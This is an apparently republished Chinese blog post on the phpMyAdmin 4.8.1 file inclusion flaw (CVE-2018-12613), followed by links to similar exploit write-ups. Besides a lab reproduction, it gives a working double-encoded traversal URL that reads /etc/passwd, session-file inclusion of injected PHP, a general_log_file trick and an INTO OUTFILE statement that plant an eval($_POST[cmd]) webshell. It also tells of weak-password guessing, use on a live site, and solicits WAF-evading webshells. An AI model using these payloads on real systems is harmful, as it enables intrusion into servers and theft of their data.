2. 程式人生 > >18.phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613)

18.phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613)

阿新 發佈:2018-11-02

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613)

phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯,

通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。

受影響版本:

phpMyAdmin 4.8.0和4.8.1受到影響。

漏洞復現:

本次實驗環境基於docker搭建,啟動環境,使用一波phpmyadmin的弱口令,像

root/root,root/123456,root/toor....登進後臺

不得不說phpmyadmin自從2.x版本有個前臺登陸繞過後,到現在前臺還沒出現過其他的漏洞,

希望廣大夥伴多多挖掘呀!!

使用弱口令 test/test ,成功登陸phpmyadmin後臺:

訪問 http://192.168.0.132:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可見/etc/passwd被讀取,說明檔案包含漏洞存在:

利用方式也比較簡單,可以執行一下  SELECT '<?php phpinfo()?>'; ,然後檢視自己的sessionid(cookie中phpMyAdmin的值):

這樣對應的SESSION檔案為 /tmp/sess_sessionid

然後在網址中包含session檔案即可:

可以看到順利執行了phpinfo();

可想而知如果我們select一個php一句話木馬,用菜刀連線,整站就可以被我們控制。

.......

實戰演練:

到phpmyadmin後臺後,getshell方法還很多,比如利用改變寫入的日誌的路徑,寫入我們的一句話木馬,

首先呢,介紹兩個MySQL全域性變數(general_log、general_log file)

  •     general log 指的是日誌儲存狀態,一共有兩個值(ON/OFF)ON代表開啟 OFF代表關閉。
  •     general log file 指的是日誌的儲存路徑

mysql 5.0版本以上會建立日誌檔案,修改日誌的全域性變數,也可以getshell。但是也要對生成的日誌有可讀可寫的許可權。

檢視日誌狀態:

show global variables like '%secure%';

general_log=ON 時,所執行的sql語句都會出現在 /var/lib/mysql/1e164993aaf5.log 檔案

那麼,如果把 general_log_file 的路徑修改為 /var/lib/mysql/1.php,那麼所執行的sql語句就會儲存在

1.php中,如果我們執行一個php小馬,就可以getshell

如果輸入不存在的路徑時:

或許我們可以利用這個來探測目錄結構,如果路徑正確的話

這樣的話在相應的目錄下就會生成一個1.php,由於我們是實戰,所以無法截圖...

再次檢視日誌的狀態:

OK!!!滿足要求!

將一句話木馬寫入1.php檔案,既然是日誌檔案,我們select查詢自然也會被儲存在日誌裡面:

我們構造 :select '<?php phpinfo();?>'

這時候相當於我們把 <?php phpinfo();?> 寫入到日誌 1.php中,我們嘗試訪問

日誌檔案:1.php

成功getshell!!!

-------------------------------------------------------

還有一種方法就是一句話木馬的寫入:

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/1.php';

當然,前提是你得知道網站的絕對路徑,方法也有很多,比如通過報錯獲取路徑,通過phpinfo.php等等

但在新版的mysql中,這句話並沒有執行成功,應為mysql新特性secure_file_priv會對讀寫檔案產生影響,

該引數用來限制匯入匯出,可以檢視該引數:

當secure_file_priv為NULL時,表示限制mysql不允許匯入匯出。所以爆出錯誤

要想使得該語句匯出成功,則需要在mysql資料夾下修改my.ini 檔案,

在[mysqld]內加入secure_file_priv ="" 即可

當secure_file_priv的值沒有具體值時,表示不對mysqld 的匯入|匯出做限制

此時就可以執行匯出命令,這裡不再復現

 

其實phpmyadmin的安全性一直在提高

比如博主昨天發現一個站,mysql操作已經安裝上了waf,會拒絕執行危險函式,像

eval(),assert()....並且資料庫的sql執行當見到 ; 號,會自動認為語句結束,這對我們構造

過狗的馬造成了困擾,如果有phpmyadmin過狗的好馬,一點更要私聊博主哦!

 

相關推薦

18.phpmyadmin 4.8.1 遠端檔案包含漏洞CVE-2018-12613

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613) phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯, 通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 受影響版本: phpMyAdmin 4.8.0和4

phpmyadmin 遠端檔案包含漏洞CVE-2018-12613

phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 漏洞記錄 漏洞編號:CVE-2018-12613 受影響版本:phpMyAdmin 4.8.0和

Drupal 遠端命令執行漏洞CVE-2018-7600

名稱: Drupal 遠端命令執行漏洞 CVE-ID: CVE-2018-7600 Poc: https://paper.seebug.org/578/ EXPLOIT-DB: https://www.exploit-db.com/exploits/44448/ 平臺: PHP 漏洞描述:

GoAhead Web伺服器遠端命令執行漏洞CVE-2017-17562漏洞復現

一、漏洞概述: 1、漏洞簡介: GoAhead Web Server,它是一個開源(商業許可)、簡單、輕巧、功能強大、可以在多個平臺執行的嵌入式Web Server。 GoAhead Web Server是跨平臺的伺服器軟體,可以穩定地執行在Windows,Linux和

Apache ActiveMQ任意檔案寫入漏洞CVE-2016-3088復現

### Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)復現 #### 一、漏洞簡介 ​ 2016年4月14日,國外安全研究人員 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多個安全漏洞,可使遠端攻擊者用惡意程式碼替代We

phpmyadmin 4.8.1任意文件包含

variables app ali 修改 val 但是 truct repl b- phpmyadmin 4.8.1任意文件包含 0x00 phpmyadmin簡述 phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工

phpMyAdmin 4.0.1--4.2.12 本地檔案包含漏洞(CVE-2014-8959)

利用條件: 1.登入phpmyadmin後臺 2.需要截斷 滿足第二個條件  php版本必須 <5.3.4  搭建環境 我們在www目錄下放置phpinfo.txt 和 phpadmin4.0.3 phpmya

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553) 一、漏洞描述 該漏洞在/install/index.php(index.php.bak)檔案中,漏洞起因是$$符號使用不當,導致變數覆蓋,以至於最後引起遠端檔案包含漏洞。 二、漏洞影響版本 DeDeCMS < 5.7-

weblogic系列漏洞整理————8、WebLogic 兩處任意檔案上傳漏洞動態分析CVE-2018-2894

0x01 前言 CNCERT前幾天發公告稱發現Oracle公司出品的基於JavaEE結構的中介軟體WebLogic產品存在一個遠端上傳漏洞,並得到了廠商的確認,危害程度評分高達9.8分。鑑於廠商已進行了安全修復,筆者對該漏洞進行了一次分析。WebLogic管理端未授權的

php檔案包含漏洞利用phpinfo復現

 利用docker復現該漏洞,訪問http://192.168.80.156:8080/phpinfo.php,可以看到頁面出現phpinfo頁面 再訪問http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到該頁面是存在檔案包含漏洞的。

Elasticsearch 核心外掛Kibana 本地檔案包含漏洞分析CVE-2018-17246

不久前Elasticsearch釋出了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console外掛存在嚴重的本地檔案包含漏洞可導致拒絕服務攻擊、任意檔案讀取攻擊、配合第三方應用反彈SHELL攻擊,下文筆者對其漏洞背景、攻擊原理和行為進行分析和復現。

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437復現

# Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)復現 ## 環境搭建 ``` docker pull medicean/vulapps:s_shiro_1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

PHPMailer < 5.2.18 遠程代碼執行漏洞CVE-2016-10033

com ifconf github cnblogs grep main src avi https PHPMailer < 5.2.18 Remote Code Execution    本文將簡單展示一下PHPMailer遠程代碼執行漏洞(CVE-2016-100

PHP任意檔案上傳漏洞CVE-2015-2348

安全研究人員今天釋出了一箇中危漏洞——PHP任意檔案上傳漏洞(CVE-2015-2348)。 在上傳檔案的時候只判斷檔名是合法的檔名就斷定這個檔案不是惡意檔案,這確實會導致其他安全問題。並且在這種情況下,在你自己的檔案中檢查漏洞很不現實,因為這個漏洞可以繞過你對檔名字尾、檔案型別(Content-Typ

HTTP.SYS遠端程式碼執行漏洞CVE-2015-1635,MS15-034

漏洞描述及滲透過程 HTTP協議堆疊(HTTP.sys)中存在一個遠端執行程式碼漏洞,該漏洞是在HTTP.sys不正確地分析特製HTTP請求時引起的。   漏洞危害 攻擊者只需要傳送惡意的http請求資料包,就可能遠端讀取IIS伺服器的記憶體資料,或使伺服器系統藍屏崩潰

JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504

Red Hat JBoss Application Server 是一款基於JavaEE的開源應用伺服器。JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java檔

Java RMI遠端反序列化任意類及遠端程式碼執行解析CVE-2017-3241

本打算慢慢寫出來的,但前幾天發現國外有研究員發了一篇關於這個CVE的文章,他和我找到的地方很相似。然而不知道是不是Oracle認為是同一個漏洞然後合併了CVE,還是說我找錯了CVE。 總之,先簡單描述一下漏洞:對於任何一個以物件為引數的RMI介面,你都可以發一個自己構建的物件,迫使伺服器端將這個物件按任

360眾測考試,weblogic題CVE-2018-2894檔案上傳漏洞

0x01 漏洞簡介 Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案上傳漏洞,Web Service Test Page 在 ‘生產模式’

zabbix-2.4.8-1添加nginx狀態監控

展示 tin 一個 active rpm waiting bash size clas 前期準備:nginx在編譯是必須要加如下參數: 並且要在nginx的配置文件中添加如下配置: server { listen *:80 default_server;

zabbix-2.4.8-1添加tcp狀態監控

param zab 結果 val init /tmp 自己 .cn net 1、安裝zabbix-agentyum -y install zabbix-2.4.8-1.el6.x86_64.rpm zabbix-agent-2.4.8-1.el6.x86_64.rpm2、